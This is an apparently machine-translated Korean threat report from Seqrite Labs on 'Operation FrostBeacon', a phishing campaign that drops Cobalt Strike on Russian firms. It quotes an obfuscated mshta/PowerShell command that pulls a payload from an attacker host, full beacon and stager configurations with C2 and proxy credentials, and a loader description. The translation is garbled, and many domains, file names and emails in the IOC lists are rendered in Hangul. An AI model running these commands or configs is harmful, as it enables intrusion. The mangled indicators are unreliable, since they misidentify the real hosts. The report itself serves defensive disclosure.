• 제품 & 서비스
        • 클라우드

          • 엔드 포인트 보호
          • 엔드 포인트 탐지 및 대응
          • 모바일 장치 관리
          • BYOD
          • 확장 된 탐지 및 대응
          • 제로 트러스트 네트워크 액세스
          • 데이터 개인 정보
        • 온프레미스

          • 엔드 포인트 보호
          • 엔드 포인트 탐지 및 대응
          • 데이터 개인 정보
        • 플랫폼

          • 악성코드 분석 플랫폼
        • 소기업

          • SOHO 토탈 에디션
        • 서비스

          • 위협 인텔
          • 디지털 위험 보호 서비스(DRPS)
          • 랜섬웨어 복구 서비스(RRaaS)
          • DPDP 준수
          • 관리되는 탐지 및 대응
  • 솔루션
    • BFSI
    • 교육
    • Government
    • 의료
    • ITeS
    • 제조업
  • 회사
    • Seqrite 소개
    • Leadership
    • 수상 및 인증
    • 뉴스 편집실
  • 파트너
    • 파트너 프로그램
    • 파트너 찾기
    • 파트너가 되십시오
  • 고객 지원
  • 자료
    • 블로그
    • 백서
    • 데이터시트
    • 고객 사례
    • 위협 보고서
    • 매뉴얼
    • POV
    • 데이터 개인 정보 보호 이해
    • DPDP 대화
정보 기술, 네트워크 및 사이버 보안 관련 블로그 | Seqrite 블로그
영업팀에 문의
  • 제품 & 서비스
        • 클라우드

          • 엔드 포인트 보호
          • 엔드 포인트 탐지 및 대응
          • 모바일 장치 관리
          • BYOD
          • 확장 된 탐지 및 대응
          • 제로 트러스트 네트워크 액세스
          • 데이터 개인 정보
        • 온프레미스

          • 엔드 포인트 보호
          • 엔드 포인트 탐지 및 대응
          • 데이터 개인 정보
        • 플랫폼

          • 악성코드 분석 플랫폼
        • 소기업

          • SOHO 토탈 에디션
        • 서비스

          • 위협 인텔
          • 디지털 위험 보호 서비스(DRPS)
          • 랜섬웨어 복구 서비스(RRaaS)
          • DPDP 준수
          • 관리되는 탐지 및 대응
  • 솔루션
    • BFSI
    • 교육
    • Government
    • 의료
    • ITeS
    • 제조업
  • 회사
    • Seqrite 소개
    • Leadership
    • 수상 및 인증
    • 뉴스 편집실
  • 파트너
    • 파트너 프로그램
    • 파트너 찾기
    • 파트너가 되십시오
  • 고객 지원
  • 자료
    • 블로그
    • 백서
    • 데이터시트
    • 고객 사례
    • 위협 보고서
    • 매뉴얼
    • POV
    • 데이터 개인 정보 보호 이해
    • DPDP 대화
홈  /  테크니컬  / 프로스트비컨 작전: 러시아를 표적으로 한 다중 클러스터 코발트 공격 작전
프로스트비컨 작전: 러시아를 표적으로 한 다중 클러스터 코발트 공격 작전
08 12월 2025

프로스트비컨 작전: 러시아를 표적으로 한 다중 클러스터 코발트 공격 작전

Written by 라야파티 락슈미 프라산나 사이
라야파티 락슈미 프라산나 사이
테크니컬

프로스트비컨 작전: 러시아를 표적으로 한 다중 클러스터 코발트 공격 작전

목차

  • 개요
  • 주요 목표
    • 지리적 초점
    • 영향을 받는 산업
  • LNK 클러스터
    • 초기 액세스: 아카이브 전달
    • 피싱 이메일 및 미끼
    • 악성 LNK 및 HTA 로더
    • 난독화된 PowerShell 페이로드
  • CVE 클러스터
    • 피싱 이메일
    • CVE 체이닝
  • 인프라 및 귀속
  • 맺음말
  • Seqrite 보호
  • IOC
  • MITRE TTP
  • 작성자

개요

Seqrite Labs는 러시아 연방 내 기업에 Cobalt Strike 비콘을 배포하는, 'Operation FrostBeacon'으로 추적되는 표적 악성코드 캠페인을 발견했습니다. 피싱 이메일은 이 위협 집단이 금전적 동기를 가지고 있으며, 지불, 계약, 조정, 법적 위험 관리 기관을 표적으로 삼고 있음을 시사합니다. 20개 이상의 초기 감염 파일이 관찰되었으며, 이 침입은 두 개의 서로 다른 클러스터를 가진 다층 감염 ​​체인을 통해 이루어집니다. 하나는 악성 바로가기 파일이 포함된 피싱 아카이브 파일을 통해 감염됩니다. 두 번째 클러스터는 기존 CVE-2017-0199 템플릿 주입 취약점을 활용하고, 심지어는 기존의 수식 편집기 취약점인 CVE-2017-11882와 연계됩니다.

두 클러스터 모두 원격 HTA 실행을 트리거하여 메모리에서 셸코드를 복호화하고 실행할 수 있는 난독화된 PowerShell 로더를 실행하고, 이를 통해 Cobalt Strike가 배포됩니다. 공격자의 생태계는 러시아가 통제하는 여러 도메인을 명령 및 제어 엔드포인트로 구성하고, 맞춤형 Cobalt Strike 가변 프로필을 사용합니다. 각 클러스터 내에서 여러 감염 경로가 관찰되었으며, 그중 일부는 올해 여러 연구원에 의해 실제 환경에서 확인되었습니다. 이 블로그에서는 여러 클러스터의 감염 워크플로우, 페이로드와 함께 추적된 관련 인프라, 그리고 공격자가 사용하는 기법에 대한 포괄적인 분석을 제공합니다.

주요 목표

지리적 초점

  • 러시아 연방

영향을 받는 산업

물류, 산업 생산, 건설 및 기술 공급 분야의 B2B 기업으로 다음 분야에 중점을 두고 있습니다.

  • 재무부서
  • 법무부
  • 기업 정보 사서함

LNK 클러스터

초기 액세스: 아카이브 전달

감염 경로는 피싱 이메일 첨부 파일을 통한 보관 파일 배포로 시작됩니다.

 

파일 이름: рекламация.zip

MD5: 7096141a5b480e793e9a890b84ebaee2수정: 2025-11-05 23:15:22처음 본: 2025-11-06 00:08:46 UTC(러시아)

이름, 타임스탬프 및 처음 본 원격 측정은 명확한 지리적 초점을 확립하며 이 캠페인은 해당 지역의 사용자를 직접 타겟으로 합니다. 러시아 연방. ZIP 파일에는 두 가지 구성 요소가 포함되어 있습니다.

  1. 미끼 Excel 통합 문서 합법적인 것처럼 보이도록 의도됨
  2. 악성 LNK 파일 PDF 문서로 위장

피싱 이메일 및 미끼

피싱 이메일이 포함되어 있지 않은 아카이브 파일 "рекламация"의 러시아어 파일명을 기반으로 이러한 초기 감염 파일을 더 찾아냈습니다. 이를 통해 총 5개의 파일과 몇 개의 추가 감염 경로, 그리고 몇 개의 흥미로운 이메일을 발견했습니다.

한 감염 경로에서 아래 이미지에서 볼 수 있듯이 이메일 ID "Kristina.Yasnova@art[.]cse[.]ru"에서 발송된 피싱 이메일이 확인되었습니다. RAR 아카이브에도 유사한 방식으로 미끼와 바로가기 파일이 포함되어 있습니다.

이메일은 계약금 지급, 법적 분쟁, 채무 추심, 중재, 그리고 행위 조정 요청(RFA)을 중심으로 구성됩니다. 이는 B2B 결제와 장기 계약이 흔한 분야에서 흔히 볼 수 있는 현상입니다. 이러한 전술은 공격자들이 피해자들이 친숙해 보이는 문서 이름, 특히 모국어로 작성된 문서 이름을 신뢰하도록 유도하는 사회공학적 공격과 일맥상통합니다. “스바드나야” 번역하다 요약/통합 시트물류, 재무 및 보고 환경에서 일반적으로 사용됩니다. 일부 보관 파일에는 열리지 않은 문서가 있는데, 이는 조정 내역이 아닌 혈압 추적 정보만 표시하는 미끼 문서로 보입니다.

 

악성 LNK 및 HTA 로더

파일 이름 : рекламация.pdf.lnk
MD5 : 16ae36df5bee92d8c4cae8e17583a2c9

 

LNK 파일은 이중 확장자 형식을 통해 PDF 문서처럼 위장되어 있습니다. 파일 이름은 “рекламация” 방법 청구/불만, 다시 한번 비즈니스 지향적인 이메일 미끼에 적합합니다. 사용자가 파일을 두 번 클릭하면 cmd.exe를 통해 다음 명령이 실행됩니다.

· /c powershell -WindowStyle 숨김 -명령 m^s^h^t^a^ ^h^t^t^p^s^:^/^/^e^z^s^t^a^t^.^r^u^/^f^l^o^w^e^r^s^f^o^r^l^o^v^e^.^g^i^f

실행 체인은 몇 가지 명확한 악성 동작을 보여줍니다. PowerShell은 다음에서 시작됩니다. 숨겨진 창 모드, 사용자에게 경고하는 시각적 프롬프트가 표시되지 않도록 합니다. 공격자는 다음을 트리거합니다. mshta.exe 문자 수준 난독화(m^s^h^t^a)를 통해 간단한 탐지를 회피합니다. 스크립트는 실행 직후 원격 URL 다음 단계 페이로드를 가져오려면. LNK 파일은 어떤 것도 열지 않습니다. 지역 미끼 문서감염이 백그라운드에서 조용히 진행될 수 있도록 합니다. LNK 파일의 URL은 다음과 같습니다.

  • hxxps://ezstat[.]ru/flowersforlove.gif

 

GIF 이미지처럼 보이지만, 이 리소스는 리디렉터 또는 로더 단계 역할을 합니다. mshta.exe가 이 리소스에 접근하면 서버는 실제 악성 구성 요소를 전달하여 응답합니다.

· hxxps://valisi[.]ru/dosing.hta

The HTA 파일은 초기 공격 단계에서 핵심 실행 구성 요소 역할을 하며 전체 Windows 스크립팅 권한을 활용합니다. mshta.exe제한 없이 스크립트를 자동으로 실행할 수 있습니다.

 

HTA는 트리거되면 Base64로 인코딩된 여러 블록을 gzip으로 압축된 PowerShell 스크립트로 재구성하고, 다음 단계 페이로드 전달을 위한 환경을 준비하며, 내장된 로직을 통해 실행을 시작합니다. 이러한 계층화된 인코딩은 난독화를 유발하고 정적 분석을 방해하며, 조기 탐지를 피하면서 공격 체인이 원활하게 진행되도록 보장합니다.

난독화된 PowerShell 페이로드

마지막 PowerShell 단계는 몇 가지 주요 기능을 수행합니다. 3단계 난독화 시퀀스를 구현하며, 각 단계는 악성 로직의 노출을 지연시키도록 의도적으로 설계되었습니다. 첫 번째 단계는 MemoryStream에 내장된 gzip으로 압축된 Base64 문자열입니다. 디코딩 및 압축 해제를 통해 두 번째 단계 PowerShell 스크립트가 생성됩니다. 이 스크립트는 두 가지 주요 기능을 포함합니다.

  • func_get_proc_address: .NET 내부 클래스 Microsoft.Win32.UnsafeNativeMethods 및 특히 해당 메서드를 남용하여 관리되지 않는 Windows API 주소를 동적으로 확인합니다. 모듈 핸들 가져오기 및 GetProc주소.
  • func_get_delegate_type: System.Reflection.Emit을 사용하여 런타임 대리자 유형을 구성하여 관리되는 대리자로 함수 포인터를 실행할 수 있도록 합니다.

이들의 역할은 로더가 호출 선언 없이 API를 호출하고 디스크에 아티팩트를 쓰지 않고도 완전한 메모리 내 실행 프레임워크를 구축하는 것입니다.

이 두 번째 단계 스크립트 안에는 세 번째이자 마지막 계층인 Base64로 인코딩된 블롭이 $v_code 변수에 저장됩니다. 디코딩 후 스크립트는 바이트 단위의 작업을 수행합니다. 무료 키 35를 사용하여 작업합니다. 이렇게 하면 원시 셸코드 버퍼가 생성되고 스크립트는 다음을 사용하여 실행 가능한 메모리를 할당합니다. 가상 할당 RWX 할당에 대한 올바른 매개변수(0x3000 할당 유형 및 0x40 보호 플래그)를 사용합니다.

복호화된 쉘코드는 동적으로 생성된 함수 포인터를 통해 복사되어 실행됩니다. 이 최종 쉘코드는 코발트 스트라이크 비콘 로더다단계 파일리스 실행 체인을 완성합니다. 압축, 중첩된 Base64, XOR 인코딩, 동적 API 분석, 그리고 직접 메모리 내 실행의 조합은 AMSI를 회피하고, EDR 계측을 우회하며, 디스크 기반 탐지를 완전히 피하도록 설계된 최신 공격 기법과 일치합니다.

디스어셈블리는 Windows x86 셸코드로, PEB를 탐색하고 kernel32.dll을 찾은 후 ROR-13 알고리즘을 사용하여 내보낸 함수 이름을 해싱하여 가져오기 없이 Win32 API를 동적으로 확인하는 반사형 로더를 구현하는 맬웨어 비콘에서 흔히 볼 수 있습니다. 이는 LoadLibraryA, GetProcAddress, VirtualAlloc, WinInet 함수 및 기타 시스템 호출에 대한 포인터를 얻기 위한 것입니다.

API 세트를 확인한 후 로드합니다. wininet.dll, jQuery 파일과 유사한 위장된 헤더와 경로 문자열을 사용하여 일반 웹 트래픽으로 위장하는 HTTP 기반 명령 및 제어 채널을 설정하고, RWX 메모리를 할당하고, 보조 페이로드를 청크 단위로 다운로드하여 할당된 영역에 기록하고, 새로 수신된 코드로 실행을 전송합니다. 이를 통해 원격 명령 실행, 페이로드 전달 및 손상된 호스트의 지속적인 제어를 위해 설계된 단계적 맬웨어 비콘 역할을 수행합니다. 스테이저 구성은 다음과 같습니다.

{'CobaltStrikeStager': {'raw': [{'netloc': 'update.ecols.ru', 'path': '/jquery-3.3.1.slim.min.js', 'port': 8443, 'headers': {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8′, 'Accept-Language': 'en-US,en;q=0.5', '참조자': 'http://code.jquery.com/’, 'Accept-Encoding': 'gzip, deflate', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko'}, 'inet_flags': ['INTERNET_FLAG_RELOAD', 'INTERNET_FLAG_NO_CACHE_WRITE', 'INTERNET_FLAG_SECURE', 'INTERNET_FLAG_KEEP_CONNECTION', 'INTERNET_FLAG_IGNORE_CERT_DATE_INVALID', 'INTERNET_FLAG_IGNORE_CERT_CN_INVALID', 'INTERNET_FLAG_NO_UI'], 'watermark': 987654321, 'type': 'HTTPS'}]}} {“Headers”: “Accept: 텍스트/html, 애플리케이션/xhtml+xml, 애플리케이션/xml;q=0.9,/;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nReferer: hxxp://code.jquery.com/\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko\r\n”, “Type”: “Metasploit Download”, “URL”: “hxxp://update.ecols.ru/jquery-3.3.1.slim.min.js”}

이 부분은 JS CDN 다운로드로 위장한 Cobalt Strike 스테이저를 나타내며, 이는 스텔스 HTTP(S)를 통해 페이로드를 가져오고 웹 트래픽과 혼합을 시도하는 1단계 로더에서 일반적으로 나타나는 현상입니다. 아래 구성은 훨씬 더 심층적인 프로필, 즉 완전히 구성된 HTTPS 비콘을 보여줍니다. 몇 가지 중요한 세부 정보는 다음과 같습니다.

  • 페이로드 난독화를 위한 Base64-URL 디코딩 및 XOR을 포함한 후처리
  • 하드코딩된 프록시 및 자격 증명
  • 프로세스 주입은 NtMapViewOfSection을 사용합니다.

{‘CobaltStrikeBeacon’: {‘raw’: [{‘BeaconType’: [‘HTTPS’], ‘Port’: 8443, ‘SleepTime’: 45000, ‘MaxGetSize’: 2801745, ‘Jitter’: 37, ‘MaxDNS’: ‘Not Found’, ‘PublicKey’: ‘30819f300d06092a864886f70d010101050003818d003081890281810084fcb90f0cb2f1dbe9de6913412e0a42fedd862c395c36c63006921d1eb5fe2860296e99283284318e84109d27ec8a17146ef21241c8012ec2ccd553b61663454d369b35189df81c8b0636513c4e9d97850e675bc3fb888bff30af985a21e5564f55c5be5275010d9b874f2a06b001ade04a3b5274bdacc1e6b8e239338f1165020301000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000’, ‘C2Server’: ‘update.ecols.ru,/jquery-3.3.1.min.js’, ‘UserAgent’: ‘Not Found’, ‘HttpPostUri’: ‘/jquery-3.3.2.min.js’, ‘Malleable_C2_Instructions’: [‘Remove 1522 bytes from the end’, ‘Remove 84 bytes from the beginning’, ‘Remove 3931 bytes from the beginning’, ‘Base64 URL-safe decode’, ‘XOR mask w/ random key’], ‘HttpGet_Metadata’: ‘Not Found’, ‘HttpPost_Metadata’: ‘Not Found’, ‘SpawnTo’: ‘00000000000000000000000000000000’, ‘PipeName’: ‘Not Found’, ‘DNS_Idle’: ‘Not Found’, ‘DNS_Sleep’: ‘Not Found’, ‘SSH_Host’: ‘Not Found’, ‘SSH_Port’: ‘Not Found’, ‘SSH_Username’: ‘Not Found’, ‘SSH_Password_Plaintext’: ‘Not Found’, ‘SSH_Password_Pubkey’: ‘Not Found’, ‘HttpGet_Verb’: ‘GET’, ‘HttpPost_Verb’: ‘POST’, ‘HttpPostChunk’: 0, ‘Spawnto_x86’: ‘%windir%\syswow64\dllhost.exe’, ‘Spawnto_x64’: ‘%windir%\sysnative\dllhost.exe’, ‘CryptoScheme’: 0, ‘Proxy_Config’: ‘hxxp://45.147.14.106:62900’, ‘Proxy_User’: ‘MxvNcQHY’, ‘Proxy_Password’: ‘3uuN9iwg’, ‘Proxy_Behavior’: ‘Use proxy server’, ‘Watermark’: 987654321, ‘bStageCleanup’: ‘False’, ‘bCFGCaution’: ‘False’, ‘KillDate’: 0, ‘bProcInject_StartRWX’: ‘False’, ‘bProcInject_UseRWX’: ‘False’, ‘bProcInject_MinAllocSize’: 17500, ‘ProcInject_PrependAppend_x86’: [‘9090’, ”], ‘ProcInject_PrependAppend_x64’: [‘9090’, ”], ‘ProcInject_Execute’: [‘ntdll:RtlUserThreadStart’, ‘CreateThread’, ‘NtQueueApcThread-s’, ‘CreateRemoteThread’, ‘RtlCreateUserThread’], ‘ProcInject_AllocationMethod’: ‘NtMapViewOfSection’, ‘bUsesCookies’: ‘True’, ‘HostHeader’: ”}]}} {“BeaconType”: [“HTTPS”], “Port”: 8443, “SleepTime”: 45000, “MaxGetSize”: 2801745, “Jitter”: 37, “C2Server”: “update.ecols.ru,/jquery-3.3.1.min.js”, “HttpPostUri”: “/jquery-3.3.2.min.js”, “Malleable_C2_Instructions”: [“Remove 1522 bytes from the end”, “Remove 84 bytes from the beginning”, “Remove 3931 bytes from the beginning”, “Base64 URL-safe decode”, “XOR mask w/ random key”], “HttpGet_Verb”: “GET”, “HttpPost_Verb”: “POST”, “HttpPostChunk”: 0, “Spawnto_x86”: “%windir%\syswow64\dllhost.exe”, “Spawnto_x64”: “%windir%\sysnative\dllhost.exe”, “CryptoScheme”: 0, “Proxy_Config”: “hxxp://45.147.14.106:62900”, “Proxy_User”: “MxvNcQHY”, “Proxy_Password”: “3uuN9iwg”, “Proxy_Behavior”: “Use proxy server”, “Watermark”: 987654321, “bStageCleanup”: “False”, “bCFGCaution”: “False”, “KillDate”: 0, “bProcInject_StartRWX”: “False”, “bProcInject_UseRWX”: “False”, “bProcInject_MinAllocSize”: 17500, “ProcInject_PrependAppend_x86”: [“kJA=”, “Empty”], “ProcInject_PrependAppend_x64”: [“kJA=”, “Empty”], “ProcInject_Execute”: [“ntdll:RtlUserThreadStart”, “CreateThread”, “NtQueueApcThread-s”, “CreateRemoteThread”, “RtlCreateUserThread”], “ProcInject_AllocationMethod”: “NtMapViewOfSection”, “bUsesCookies”: “True”, “HostHeader”: “”}

PowerShell을 통해 MSHTA 프로세스를 트리거하여 결국 Cobalt Strike 비콘을 배포하기 위해 메모리 내에서 셸코드를 디코딩하고 로드하는 등 다양한 도메인과 스테이저 세트를 사용하는 이러한 감염 파일이 더 많이 관찰되었습니다.

CVE 클러스터

두 번째 클러스터에서는 DOCX 파일까지 피싱 첨부 파일로 전송되는 것을 확인했습니다. 이는 일반적인 CVE-2017-0199 취약점을 악용하여 수식 편집기를 작동시켜 원격 HTA 파일을 실행합니다.

피싱 이메일

이 사건의 피싱 이메일은 채무 상환을 요구하는 합법적인 요구라고 주장합니다. 2025년 3월 14일까지 대금이 지급되지 않을 경우, 하바롭스크 중재 법원에 연체금(벌금 및 이자 포함) 회수를 위한 소송을 제기할 것이라고 명시되어 있습니다. 이 메시지는 추정 계약의 구체적인 조건을 언급하며, 서명 및 인증된 화해 명세서와 원본 문서를 법적 주소로 우편 발송하고 이메일 통신 기록을 보관해 달라고 요청합니다.

비슷한 구조의 또 다른 이메일에서는 서로 다른 지불 기한과 법적 지역을 언급하고 있습니다. 계약서에 따라 은행 송금일을 기준으로 지불이 인정되며, 은행 계좌 정보를 포함한 자세한 서명란으로 끝맺는다고 명시되어 있습니다.

이러한 이메일이 더 많이 발견되었는데, 이는 대량 피싱 템플릿이 수동 또는 자동으로 재사용되었음을 명확히 나타냅니다. 악성 문서 첨부 파일 내부 광고.docx, word/settings.xml.rels 파일에는 외부 템플릿을 참조하는 attachedTemplate 관계가 포함되어 있습니다. 아쿠아콤플렉스[.]루 다음과 같이 :

이 구성은 Microsoft Word가 문서 초기화 중에 원격 템플릿을 요청하고 로드하도록 합니다. 이러한 외부 참조 템플릿은 다음과 관련된 악용 기법과 일치합니다. CVE-2017-0199공격자가 원격 URL을 삽입하여 매크로를 사용하지 않고 보조 페이로드(일반적으로 HTA 또는 스크립트 기반 맬웨어)를 전송하는 경우입니다. 아쿠아컴플렉트.ru 따라서 도메인은 해당 문서가 감염 경로의 일부로 원격 템플릿 삽입을 사용했음을 확인합니다. 한 경로에서 16진수 형식으로 인코딩된 HTML 엔터티가 RTF 파일을 다운로드하는 것을 확인했습니다. 이 파일은 내장된 매크로를 포함하거나 OLE 객체를 통해 페이로드를 악용할 수 있습니다.

CVE 체이닝

대부분의 체인에서, Equation Editor의 또 다른 오래된 취약점인 CVE-2017-11882를 악용하는 RTF 파일을 다운로드하는 문서가 발견되었습니다. 수년이 지난 지금도 위협 행위자들은 패치에도 불구하고 여전히 이 취약점을 악용하려고 시도하고 있습니다. 이 두 취약점의 유사한 체인이 실제 공격에서도 발견되었는데, CVE-2017-0199는 유포에 사용되고, CVE-2017-11882는 LNK 클러스터와 유사한 리디렉션 후 원격 HTA 파일을 실행하는 데 사용되어 Cobalt Strike를 유발합니다.

2025년에도 사이드와인더 묶인 이러한 특정 CVE는 남아시아(스리랑카, 방글라데시, 파키스탄)의 고위 정부 기관을 표적으로 삼았으며, CVE-2017-0199와 CVE-2017-11882를 초기 감염 벡터로 악용하는 악성 Word/RTF 파일을 사용했습니다.

인프라 및 귀속

최종 비콘을 다운로드하는 Cobalt Strike 스테이저 "update[.]ecols[.]ru"의 URL을 기반으로 유사한 URL을 찾아 다음 쿼리를 사용하여 40개 이상의 해당 URL을 식별했습니다.

이로 인해 유사한 보관 파일 및 문서 파일과 러시아어로 작성된 여러 미끼를 사용한 추가 캠페인이 발견되었습니다. 관찰된 도메인은 모두 러시아 제공업체에 등록되어 있으며, 생성 날짜 정보는 아래에 나와 있습니다.

도메인 생산 일 기록
사건.zilab[.]ru 2015-11-15T09:46:56Z RU-센터-RU
mcnn[.]ru 2004-10-18T20:00:00Z R01-RU
order.edrennikov[.]ru 2007-08-26T20:00:00Z RU-센터-RU
cba.abc92[.]ru 1999-10-26T15:07:24Z RU-센터-RU
법의학[.]jwork[.]ru 2009-05-06T20:00:00Z RD-RU
호스트바이넷[.]ru 2017-04-09T21:43:46Z R01-RU
moscable77[.]ru 2019-03-26T11:32:10Z REGRU-RU
gk-stst[.]ru 2023-01-12T05:38:27Z REGTIME-RU
아쿠아콤플렉스[.]루 2016-02-26T15:47:04Z REGRU-RU
ezstat[.]ru 2011-01-13T13:41:30Z RU-센터-RU
에코스트로이33[.]루 2020-10-14T07:22:13Z R01-RU
발리시[.]루 2016-03-11T10:14:40Z REGRU-RU
bsprofi[.]ru 2010-12-29T11:51:35Z REGTIME-RU
이플리스[.]루 2011-01-15T19:15:01Z RU-센터-RU
제타그[.]루 2015-12-18T09:47:12Z RD-RU
리에리[.]루 2020-03-04T15:48:22Z REGRU-RU
도징펌프[.]ru 2015-04-03T08:57:01Z RD-RU
에셋노드64[.]루 2023-08-14T16:38:10Z REGRU-RU
야드로[.]루 2000-12-19T21:00:00Z RU-센터-RU
iplogger[.]ru 2011-01-22T04:15:13Z RU-센터-RU
크로나77[.]루 2018-12-19T11:06:01Z 베겟-루
bti25[.]ru 2022-12-10T06:57:06Z 베겟-루
에멕[.]수 2015-06-05T16:01:05Z RD-SU
gemme-cotti[.]ru 2016-02-02T20:21:38Z REGRU-RU

분석 결과, 피싱 이메일과 대상을 고려할 때 해당 위협 행위자는 러시아어를 구사하는 금전적 동기를 가진 사이버 범죄 집단으로 추정됩니다. TTP와 대상 지정 방식이 중복되는 것을 확인했습니다. 코발트 그룹 전 세계의 금융 기관을 표적으로 삼았지만, Operation FrostBeacon에서 특정 맬웨어 계열을 사용한 것은 확인되지 않았습니다.

맺음말

Seqrite Labs는 재무 및 법무 부서를 중심으로 러시아 B2B 기업을 표적으로 삼는 다중 클러스터 캠페인을 분석했습니다. FrostBeacon 작전으로 추적되는 이 금전적 동기를 가진 사이버 범죄 조직은 두 가지 병행 전송 경로, 즉 악성 DOCX 미끼와 무기화된 ZIP 아카이브를 사용하는데, 이 두 가지 모두 궁극적으로 Cobalt Strike Beacon의 메모리 내 배포라는 동일한 목표를 향해 나아갑니다.

첫 번째 경로에서 위협 행위자는 CVE-2017-0199 취약점을 악용하는 Word 문서를 배포했으며, 이 문서는 CVE-2017-11882 취약점과 연결되어 있습니다. 이와 반대로, 두 번째 감염 경로는 바로가기 파일이 포함된 악성 압축 파일을 배포합니다. 두 경로 모두 러시아 도메인을 통해 리디렉션된 후 원격 HTA 파일을 실행하여 다계층 PowerShell 로더를 실행합니다. 이 로더는 셸코드를 실행하는 세 계층의 인코딩을 사용하여 스테이저를 다운로드하고 최종적으로 정상 프로세스에 침투하여 Cobalt Strike를 은밀하게 배포합니다.

Seqrite 보호

  • lnk.trojan.1762957461
  • 트로이 목마.A18583779
  • lnk.trojan.1742297824
  • 트로이 목마 스크립트 38976
  • 일반 PMF.S30570383

IOC

파일

아카이브
7096141a5b480e793e9a890b84ebaee2 рекламация.zip
833aa0a39625a4014c3c019ecf06a577 광고.rar
8ddcc3d272dd6b926d5c439a59198b51 도고보르.rar
58f1700e70ea49c0c520429fae09391b (RAR)
이메일
c088e4f9875bf4df552e418a54c4ce07 크리스티나.야스노바@art.cse[.]ru
7261fc5b42cc63ae34f520fc8f3ef5a4 kornilova@impex-him[.]ru
c088e4f9875bf4df552e418a54c4ce07 크리스티나.야스노바@art.cse[.]ru
8f60ad980885ff0000f6a9d29ce95376 asrogov@kzst45[.]ru
5facd6d79a20249fd58c29f9dc98dfe2 asrogov@kzst45[.]ru
bbd10ee2ff2488faa297593e79df4512 카리나@툴하우스[.]루
456289209b90d09e54a1a439e3fe5248 카리나@툴하우스[.]루
7340c916254e31e0dbb7fcec7a89cfb0 야코블레바@effectovent[.]ru
8ba9f38456557e58bf4613b363298d55 야코블레바@effectovent[.]ru
08fc33687a6158dd15aa72e631905e10 야코블레바@effectovent[.]ru
48d588add63a0373ec896da4ee59b79e buh@toolhaus[.]ru
LNK
16ae36df5bee92d8c4cae8e17583a2c9 рекламация.pdf.lnk
eb0516a78fa169ab0867cb9b98136357 рекламация.pdf.lnk
16e9c51f60b629257140cb6ffc7a36ec рекламация.pdf.lnk
f16417878356a08f840dac7f03461b5d акт сверки.xls.lnk
5e51ff594c46170ef278d1c18cded7d0 Договор.pdf.lnk / досудебное.pdf.lnk
문서
ff96714b6e31e362e7acce7338f30cf0 광고.docx
f3a4176a981e50d76b8e4716400e86f2 광고.docx
0e1aa36d57416bac883e11f5860348cc рекламация.doc
adf61ffa03806b954450c8954fb976c7 рекламация.doc
94b800809107fb2ef6ec640ff1e0fb51 рекламация.doc
6d4691e3262d4271f76b14a9ea511ca5 претензия.docx
dfb56174c5ec2d0d8d82eb4b5ebf4f38 требование_19.03.docx
8d0821b0bb290beb156ad836237cff05 досудебное.doc
f9026fabfb8d131863ad06fd72eb2717 이스코보에_19.03.docx
5461a16272491f8e8b460c687d3436a6 претензия.doc
5667aa62833dd6ebd15da40130ab963d рекламация_исх_05.04.24.doc.doc
55bcc275baaae11ab634c03a9de36557 시로.doc
dcad3be881d072240b4c5c601e562ed2 폭스.docx / 아쿠아.docx
a02f62d86f127b2547beac11420165fa 광고.doc
5efb844fefdbd92ccab34a5ec135ecac tmppzd1p0zv.docx
30517af2afba9baf55941c250cfd8a0f 트램프.rtf
cdfb407a0b894f5b4a6108273b81d864 로지스타.rtf
98f21aabbf9a76d762813d6c0ec8c876 첫 번째.rtf
600aeffa4395c00be2958fd8dd5135a8 고고.rtf
2e8a01026b5c298a9b1d2519241f0b16 오픈ai.rtf
582f7f2c93b6e14fb6c14a9b3ad09a83 배경.rtf
ef854d4cb12974fc702d10b403b3ef0b 케어.rtf
c1f40aeaf0606255920a3b82e80b64cc (RTF)
ac558fd07ffa0d6831d523b8af8ac80b (RTF)
c1f40aeaf0606255920a3b82e80b64cc (RTF)
6b8d22221e7c0dbcde24bc687a7dd6cd (RTF)
a5bc486ca38160ae9f54650d790d9684 (RTF)
ba8a950edf8c1414a978d9a4111343e2 (DOCX)
HTA
020829a48c813d34aa68bcda4695144e 투여량.hta
74f23f2e1e9d209d0961bbf6ff74dafe 야.타
2516898e2cb2cb1dca166bc69b7379c2 complex.hta
adef76d41463df53283588622c5e48e3 최소.hta
dcdc1bad9fb1c049b7f28afa7dc8712a z.hta
a20f54df1e75c661d6670447d74ce6f7 (HTA)
976649b232d3525dd239f7139a65dd92 로지스타.hta
9e5488696f4c5bf354e2e94775d9277c 이익.hta
7059cd5ff17c2983ee6f33053d501ab3 중국.hta
835f3661ef77bc4c083f6da9b11c6e5e nciki.hta
594d802ceebb1042101ffafa3e98caa6 미다.하타
8bddf8880ab3c631abd3ca452924d556 게이.hta
코발트 스트라이크 스테이저/비콘
f87227dad7bedf66bf1a1b97aa36bf62
2c18c78ec584c5d2d045c9ab94774ad7
395da66bee080c943e820b4e61e50de6
315bcab1a9cbfe0b5b24676c2016a9cc
4ac75939c482d5c30637d56a379835f1
feae3d231a354882bb0f70889cc69a74

URL이

트리거
hxxps://ezstat.ru/flowersforlove.gif
hxxps://yip.su/txttxt.jpg
hxxps://ezstat.ru/txttx.txt
hxxps://iplis.ru/lovers.jpeg
hxxps://iplis.ru/tramp.jpg
hxxps://iplis.ru/laydowngrenade.jpeg
hxxps://iplogger.cn/forensicsas.png
hxxps://iplis.ru/penises.jpg
hxxps://ezstat.ru/kissmyass.gif
hxxps://iplis.ru/camorra.gif
hxxps://yip.su/ncikigovru.gif
hxxps://valisi.ru/dosing.hta
hxxp://canature.su/ya.hta
hxxp://aquacomplect.ru/complex.hta
hxxps://bsprofi.ru/min.hta
hxxp://zetag.ru/z.hta
hxxp://vlasta-s.ru/logista.hta
hxxp://ecols.ru/ecols.hta
hxxp://zetag.ru/z.hta
hxxps://bsprofi.ru/profit.hta
hxxp://dosingpumps.ru/nciki.hta
hxxps://yip.su/certgovrufuck.gif
hxxp://zetag.ru/siro.doc
hxxp://zetag.ru/tramp.rtf
hxxp://aquacomplect.ru/aqua.docx
hxxp://clack.su/fox.docx
hxxp://vlasta-s.ru/logista.rtf
hxxp://valisi.ru/first.rtf
hxxp://ecols.ru/gogo.rtf
